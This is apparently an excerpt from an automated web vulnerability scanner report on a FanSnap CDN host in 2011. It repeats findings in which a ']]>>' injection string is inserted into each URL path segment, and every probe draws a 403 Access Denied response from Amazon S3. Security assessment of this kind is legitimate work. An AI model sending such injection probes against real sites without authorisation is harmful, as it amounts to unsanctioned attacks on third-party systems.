Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AD5969C5272C5072</RequestId><HostId>/XbEdueLcFmUMMWYDUVVSHwRsSjxDxKKJJajeCWf6uAWF0VfJk
...[SNIP]...

8.204. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9E1EBADA150E2C6C
x-amz-id-2: Z79G2Gwb68wDM8R/9OLave0TNoQGtMXsfDu5eVLy23STfQGkLqD7Nr2gSOWS+Yiy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:18 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: dd7f5c64bd1c22e891b9e5a00356b2744a04f1e2e8b06391524013ffbf2fc748a9a409915d345621
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9E1EBADA150E2C6C</RequestId><HostId>Z79G2Gwb68wDM8R/9OLave0TNoQGtMXsfDu5eVLy23STfQGkLq
...[SNIP]...

8.205. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6C13D5704545D95B
x-amz-id-2: oLdzht6GSIIiakC+4WfMjJaSMtXe412IUMKyfhCRl95gMgNm/4pXCRebcYc4l25y
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:22 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f80dc6ebcbb2ebd4e584646f4e59eeb6b6725a49cd6ecfc62056ed934bf12ed2cffba43de750417e
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6C13D5704545D95B</RequestId><HostId>oLdzht6GSIIiakC+4WfMjJaSMtXe412IUMKyfhCRl95gMgNm/4
...[SNIP]...

8.206. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-large-511.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F1122D085F1BF757
x-amz-id-2: 8UOZsQXbwQkw38ECJb6Lo+aw2xaHBT+74nVt/uJ0rA/yVaDEYdSJjMGMaL/hnxC8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:25 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 93b8faac7a2d65f6e081bd9ea58386d84edeaafe23c2270106733c9ab58ad579e8c9766a4ad1273a
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F1122D085F1BF757</RequestId><HostId>8UOZsQXbwQkw38ECJb6Lo+aw2xaHBT+74nVt/uJ0rA/yVaDEYd
...[SNIP]...

8.207. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 301F2BF9BC988511
x-amz-id-2: okOT+aukvO9gWm2huDe4R+1Gbyxjgxux0b9FGIiKiYcI2z2O0vLfhfAdtsQXxhDQ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:37:27 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6e8ee9983a8036d8b1f351d5da216c8357f7ffc5ebc71b9fbd9fbd222b45d44baa45a4a9b772975c
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>301F2BF9BC988511</RequestId><HostId>okOT+aukvO9gWm2huDe4R+1Gbyxjgxux0b9FGIiKiYcI2z2O0v
...[SNIP]...

8.208. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-1.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 25AA2945D2C2D2A8
x-amz-id-2: QlBQyewV1BHIAtqOWVK9AiyrKL/Cf/YJd2AJ21GUkVsrpQbcm9crXJWSahwQKTFD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 304405e0290e905e9686a3af7215496d451c60b4cde39998594fc79c44638cf994663f4a11b42be3
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>25AA2945D2C2D2A8</RequestId><HostId>QlBQyewV1BHIAtqOWVK9AiyrKL/Cf/YJd2AJ21GUkVsrpQbcm9
...[SNIP]...

8.209. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-1.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D6C725EEBA2CEC2C
x-amz-id-2: B8BjCOl5rNpAvQI5nO9GfHD+4SJyUM/dYIJlsZbYdzh02WuzBM53MIHvFhve/w/a
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6ae379a146fb4bc853e310cd6f2aa52806c3b9589c5bbde398118bd02489185ac4ad1e3d71115787
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D6C725EEBA2CEC2C</RequestId><HostId>B8BjCOl5rNpAvQI5nO9GfHD+4SJyUM/dYIJlsZbYdzh02WuzBM
...[SNIP]...

8.210. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-1.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 430005F252D92449
x-amz-id-2: og8U60uJliIjymQQzs3iuLP7XETclhYDxJaHz9tBLBDcevJ2gsNBJzlGU3Tqz4Vp
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8392b50da117744b61c91dd61ed271ca476aeb88deef992b919d67d3b43c8221f0e92f2fe318ebc5
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>430005F252D92449</RequestId><HostId>og8U60uJliIjymQQzs3iuLP7XETclhYDxJaHz9tBLBDcevJ2gs
...[SNIP]...

8.211. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D55E32430DE49866
x-amz-id-2: 0YbDOszYL06l+YT/XBAV2BGNLm+tumChFElhcdjjaPdAwU4l8izA+2EStKWH3WIk
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 37a748b3c2c8468bc9e44262fc93b2183bb9966ad043723ec08c6d5439308dc83b8c14df34b40b92
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D55E32430DE49866</RequestId><HostId>0YbDOszYL06l+YT/XBAV2BGNLm+tumChFElhcdjjaPdAwU4l8i
...[SNIP]...

8.212. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 05EA5656E471C2F9
x-amz-id-2: Y3/CgH9vxf4khPHqV+k248CBhULNFSofDg/Pfs4ZhBsSSq/5qtHUfXgVYsCUBhV8
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:33 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2b04cef12d08bcbc4aba2f98e34ee355dfaa4026b0dacfcfa90208db1b6979e5395dca9c517246dc
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>05EA5656E471C2F9</RequestId><HostId>Y3/CgH9vxf4khPHqV+k248CBhULNFSofDg/Pfs4ZhBsSSq/5qt
...[SNIP]...

8.213. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bg_bundle2.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4AFEE88B055CB282
x-amz-id-2: MQqOl41EUFQL3jGfJdMUNzxA/xreLU0vH3BFyRsSuHIkmsa0vGgThJcMNF6RPdUx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:37 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 3f53906a4c7836d2fee1caea6b276cd4af194f9b0666824ed2e0e0394e1100abf59034387ef02bcb
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4AFEE88B055CB282</RequestId><HostId>MQqOl41EUFQL3jGfJdMUNzxA/xreLU0vH3BFyRsSuHIkmsa0vG
...[SNIP]...

8.214. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 99BF904483F966D3
x-amz-id-2: p6qJ/cgVguBl3nlmpAG3L/RKq6oFvrpyxlUHk+7r3bzmjwPocjFwofZ9rjVAZwD5
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:42 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 15cf255aaeaa95cd99593d702cbf71463686ff7b52481ef5e22b502804e26ad513ddfbb0828568ec
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>99BF904483F966D3</RequestId><HostId>p6qJ/cgVguBl3nlmpAG3L/RKq6oFvrpyxlUHk+7r3bzmjwPocj
...[SNIP]...

8.215. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EB102B7B59E803B3
x-amz-id-2: VQC42sm2yiDDyQ7eOoKub3dmdvtyJz7ySbOBAjQrFONnPRUGRXdgPRJqQ10uYRY+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 18d85881c1a7e47497898fa877679dac3d8077093394285c0447d7091a5b7da57112338d7bcd88dd
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EB102B7B59E803B3</RequestId><HostId>VQC42sm2yiDDyQ7eOoKub3dmdvtyJz7ySbOBAjQrFONnPRUGRX
...[SNIP]...

8.216. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: F72FF991C4F9F7D4
x-amz-id-2: SeUTuveXExYFMPH0cvIzO3nE/kc1Pw53egioXtm4aVvNCyxIyIJByFEq2xoDfxAq
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1619bdd081f97e9ea154daca86aae3a1510c5146f4001312198dcfbe83d8901f42c0ce6e0cafe573
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F72FF991C4F9F7D4</RequestId><HostId>SeUTuveXExYFMPH0cvIzO3nE/kc1Pw53egioXtm4aVvNCyxIyI
...[SNIP]...

8.217. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-3.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-3.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 7E17C63772594B09
x-amz-id-2: ElsQOXF8vl19UMV3W8Be5z/OKFKGKcFsclKeWtNVw0Ix5aM8K3UEej/4icyfU/RE
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f77948c72d3cbf81d4ae28b074b4a04cebae99801ec2c027b10f93eed3d2000c19be09230067efea
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 27e9da6719f6373893565138c47b2497.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
